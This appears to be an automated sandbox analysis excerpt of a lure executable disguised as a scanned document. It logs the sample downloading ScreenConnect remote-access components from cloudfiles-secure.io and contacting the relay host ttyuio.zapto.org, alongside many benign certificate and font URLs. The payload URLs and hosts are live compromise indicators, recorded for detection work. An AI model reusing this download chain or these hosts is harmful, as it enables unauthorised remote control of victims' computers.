                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe HTTP/1.1Host: cloudfiles-secure.ioAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Core.dll HTTP/1.1Host: cloudfiles-secure.ioAccept-Encoding: gzip
                  Source: global trafficDNS traffic detected: DNS query: cloudfiles-secure.io
                  Source: global trafficDNS traffic detected: DNS query: ttyuio.zapto.org
                  Source: Scan_doc_09_16_24_1203.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                  Source: C56C4404C4DEF0DC88E5FCD9F09CB2F10.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt
                  Source: Scan_doc_09_16_24_1203.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                  Source: Scan_doc_09_16_24_1203.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                  Source: F2E248BEDDBB2D85122423C41028BFD4.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt
                  Source: Scan_doc_09_16_24_1203.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, C56C4404C4DEF0DC88E5FCD9F09CB2F1.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                  Source: dfsvc.exe, 00000001.00000002.2619140064.0000026180622000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2619140064.00000261806F1000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2619140064.00000261805C5000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2619140064.000002618057C000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2619140064.00000261806B9000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2619140064.00000261807DC000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2619140064.000002618067B000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2619140064.00000261807E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cloudfiles-secure.io
                  Source: svchost.exe, 00000005.00000002.2961471636.0000013D8E211000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                  Source: dfsvc.exe, 00000001.00000002.2619140064.000002618057C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.
                  Source: Scan_doc_09_16_24_1203.exe, 00000000.00000002.1950326930.00000000011EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.c
                  Source: Scan_doc_09_16_24_1203.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                  Source: Scan_doc_09_16_24_1203.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                  Source: Scan_doc_09_16_24_1203.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                  Source: dfsvc.exe, 00000001.00000002.2639936321.00000261F99A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.c
                  Source: ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                  Source: Scan_doc_09_16_24_1203.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                  Source: dfsvc.exe, 00000001.00000002.2634391699.00000261F76E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                  Source: 57C8EDB95DF3F0AD4EE2DC2B8CFD4157.1.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab
                  Source: dfsvc.exe, 00000001.00000002.2640737589.00000261F9A04000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enQ
                  Source: svchost.exe, 00000005.00000003.1724316618.0000013D8E458000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.5.dr, edb.log.5.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
                  Source: edb.log.5.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
                  Source: edb.log.5.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
                  Source: edb.log.5.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
                  Source: svchost.exe, 00000005.00000003.1724316618.0000013D8E458000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.5.dr, edb.log.5.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
                  Source: svchost.exe, 00000005.00000003.1724316618.0000013D8E458000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.5.dr, edb.log.5.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
                  Source: svchost.exe, 00000005.00000003.1724316618.0000013D8E48D000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.5.dr, edb.log.5.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
                  Source: edb.log.5.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                  Source: C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F1410.1.drString found in binary or memory: http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfIs%2BLjDtGwQ09XEB1Yeq%2BtX%2BBgQQU7NfjgtJxX
                  Source: Scan_doc_09_16_24_1203.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://ocsp.digicert.com0
                  Source: Scan_doc_09_16_24_1203.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, C56C4404C4DEF0DC88E5FCD9F09CB2F1.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://ocsp.digicert.com0A
                  Source: Scan_doc_09_16_24_1203.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://ocsp.digicert.com0C
                  Source: Scan_doc_09_16_24_1203.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://ocsp.digicert.com0X
                  Source: dfsvc.exe, 00000001.00000002.2640132774.00000261F99BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.cr
                  Source: dfsvc.exe, 00000001.00000002.2641108291.00000261F9A91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertTrustedRootG4.crl
                  Source: dfsvc.exe, 00000001.00000002.2641485344.00000261F9B0B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.micro
                  Source: svchost.exe, 00000005.00000002.2960166987.0000013D88EB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.microsoft.
                  Source: dfsvc.exe, 00000001.00000002.2619140064.000002618001A000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000B.00000002.2961877052.0000000002016000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000D.00000002.2020769153.0000000002E21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: Amcache.hve.4.drString found in binary or memory: http://upx.sf.net
                  Source: dfsvc.exe, 00000001.00000002.2636308284.00000261F8E72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                  Source: dfsvc.exe, 00000001.00000002.2636308284.00000261F8E72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                  Source: Scan_doc_09_16_24_1203.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://www.digicert.com/CPS0
                  Source: dfsvc.exe, 00000001.00000002.2636308284.00000261F8E72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                  Source: dfsvc.exe, 00000001.00000002.2636308284.00000261F8E72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                  Source: dfsvc.exe, 00000001.00000002.2636308284.00000261F8E72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                  Source: dfsvc.exe, 00000001.00000002.2636308284.00000261F8E72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                  Source: dfsvc.exe, 00000001.00000002.2636308284.00000261F8E72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                  Source: dfsvc.exe, 00000001.00000002.2636308284.00000261F8E72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                  Source: dfsvc.exe, 00000001.00000002.2636308284.00000261F8E72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                  Source: dfsvc.exe, 00000001.00000002.2636308284.00000261F8E72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                  Source: dfsvc.exe, 00000001.00000002.2636308284.00000261F8E72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                  Source: dfsvc.exe, 00000001.00000002.2636308284.00000261F8E72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                  Source: dfsvc.exe, 00000001.00000002.2636308284.00000261F8E72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                  Source: dfsvc.exe, 00000001.00000002.2636308284.00000261F8E72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                  Source: dfsvc.exe, 00000001.00000002.2636308284.00000261F8E72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                  Source: dfsvc.exe, 00000001.00000002.2636308284.00000261F8E72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                  Source: dfsvc.exe, 00000001.00000002.2636308284.00000261F8E72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                  Source: dfsvc.exe, 00000001.00000002.2636308284.00000261F8E72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                  Source: dfsvc.exe, 00000001.00000002.2636308284.00000261F8E72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                  Source: dfsvc.exe, 00000001.00000002.2636308284.00000261F8E72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                  Source: dfsvc.exe, 00000001.00000002.2636308284.00000261F8E72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                  Source: dfsvc.exe, 00000001.00000002.2636308284.00000261F8E72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                  Source: dfsvc.exe, 00000001.00000002.2636308284.00000261F8E72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                  Source: dfsvc.exe, 00000001.00000002.2636308284.00000261F8E72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                  Source: dfsvc.exe, 00000001.00000002.2619140064.00000261804C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.w3.o
                  Source: dfsvc.exe, 00000001.00000002.2619140064.0000026180354000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2619140064.00000261804C8000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2619140064.00000261803F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.w3.or
                  Source: dfsvc.exe, 00000001.00000002.2619140064.0000026180089000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.xrml.org/schema/2001/11/xrml2core
                  Source: dfsvc.exe, 00000001.00000002.2619140064.0000026180089000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.xrml.org/schema/2001/11/xrml2coreS
                  Source: dfsvc.exe, 00000001.00000002.2636308284.00000261F8E72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                  Source: dfsvc.exe, 00000001.00000002.2619140064.00000261806F1000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2619140064.00000261805C5000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2619140064.000002618057C000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2619140064.00000261806B9000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2619140064.00000261807E5000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2619140064.00000261801E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cloudfiles-secure.io
                  Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.1964806905.00000000005B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cloudfiles-secure.io/Big
                  Source: dfsvc.exe, 00000001.00000002.2619140064.00000261807E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect
                  Source: dfsvc.exe, 00000001.00000002.2619140064.000002618067B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect.Cli
                  Source: Scan_doc_09_16_24_1203.exe, 00000000.00000002.1950326930.00000000011EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect.Client.appli
                  Source: dfsvc.exe, 00000001.00000002.2638143104.00000261F9404000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2639140020.00000261F9938000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2619140064.00000261803F5000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2640737589.00000261F9A04000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1965529685.00000000022E1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1965529685.00000000022EF000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1966264306.000000001ABC7000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1966450277.000000001AC1D000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1965529685.0000000002397000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect.Client.application
                  Source: dfsvc.exe, 00000001.00000002.2619140064.00000261804A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect.Client.application#ScreenConnect.W
                  Source: dfsvc.exe, 00000001.00000002.2619140064.00000261804A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect.Client.application#ScreenConnect.W0
                  Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.1964767967.0000000000594000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1966344206.000000001ABE0000.00000004.00000020.00020000.00000000.sdmp, 5VTPZWXQ.log.1.drString found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect.Client.application#ScreenConnect.WindowsClient.applic
                  Source: dfsvc.exe, 00000001.00000002.2641007006.00000261F9A75000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1966264306.000000001ABC7000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1965310592.000000000069C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect.Client.application%%%
                  Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.1964806905.00000000005E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect.Client.application561934e089
                  Source: 5VTPZWXQ.log.1.drString found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=ttyuio.zapto.o
                  Source: dfsvc.exe, 00000001.00000002.2638143104.00000261F9404000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect.Client.applicationA
                  Source: dfsvc.exe, 00000001.00000002.2634391699.00000261F76E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect.Client.applicationEB
                  Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.1965529685.00000000022EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect.Client.applicationX
                  Source: dfsvc.exe, 00000001.00000002.2640737589.00000261F9A04000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect.Client.applicationestn32
                  Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.1966450277.000000001AC1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect.Client.applicationlture=neutraQ
                  Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.1966450277.000000001AC1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect.Client.applicationps_
                  Source: dfsvc.exe, 00000001.00000002.2640737589.00000261F9A04000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect.Client.applicationsa
                  Source: dfsvc.exe, 00000001.00000002.2619140064.000002618067B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect.Client.dll
                  Source: dfsvc.exe, 00000001.00000002.2639936321.00000261F99A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect.Client.dllJ
                  Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.1965529685.0000000002397000.00000004.00000800.00020000.00000000.sdmp, 5VTPZWXQ.log.1.drString found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect.Client.manifest
                  Source: dfsvc.exe, 00000001.00000002.2638143104.00000261F9404000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect.Client.manifest1
                  Source: dfsvc.exe, 00000001.00000002.2619140064.000002618057C000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2619140064.00000261806B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect.ClientServi
                  Source: dfsvc.exe, 00000001.00000002.2619140064.00000261806B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect.ClientService.dll
                  Source: dfsvc.exe, 00000001.00000002.2638143104.00000261F9404000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect.ClientService.dllZ
                  Source: dfsvc.exe, 00000001.00000002.2619140064.000002618057C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect.ClientService.exe
                  Source: dfsvc.exe, 00000001.00000002.2638143104.00000261F9404000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect.ClientService.exe0
                  Source: dfsvc.exe, 00000001.00000002.2638143104.00000261F9404000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect.ClientService.exeo
                  Source: dfsvc.exe, 00000001.00000002.2619140064.00000261807E5000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2619140064.00000261801E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect.Core.dll
                  Source: dfsvc.exe, 00000001.00000002.2641523029.00000261F9B26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect.Core.dlll7
                  Source: dfsvc.exe, 00000001.00000002.2619140064.00000261806F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect.Win
                  Source: dfsvc.exe, 00000001.00000002.2619140064.00000261806F1000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2619140064.000002618057C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect.Windows.dll
                  Source: dfsvc.exe, 00000001.00000002.2641523029.00000261F9B26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect.Windows.dlll6
                  Source: dfsvc.exe, 00000001.00000002.2619140064.000002618067B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect.WindowsBackstageShell.e
                  Source: dfsvc.exe, 00000001.00000002.2619140064.00000261805C5000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2619140064.000002618057C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect.WindowsBackstageShell.exe
                  Source: dfsvc.exe, 00000001.00000002.2619140064.000002618067B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect.WindowsBackstageShell.exe.config
                  Source: dfsvc.exe, 00000001.00000002.2619140064.00000261806F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect.WindowsClie
                  Source: dfsvc.exe, 00000001.00000002.2619140064.0000026180622000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect.WindowsClient.e
                  Source: dfsvc.exe, 00000001.00000002.2619140064.00000261807E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect.WindowsClient.exe
                  Source: dfsvc.exe, 00000001.00000002.2619140064.000002618067B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect.WindowsClient.exe.config
                  Source: dfsvc.exe, 00000001.00000002.2638143104.00000261F9404000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect.WindowsClient.exed
                  Source: dfsvc.exe, 00000001.00000002.2619140064.000002618067B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect.WindowsFileMana8
                  Source: dfsvc.exe, 00000001.00000002.2619140064.000002618067B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect.WindowsFileManager.exe
                  Source: dfsvc.exe, 00000001.00000002.2619140064.00000261805C5000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2619140064.000002618057C000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2619140064.00000261801E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect.WindowsFileManager.exe.config
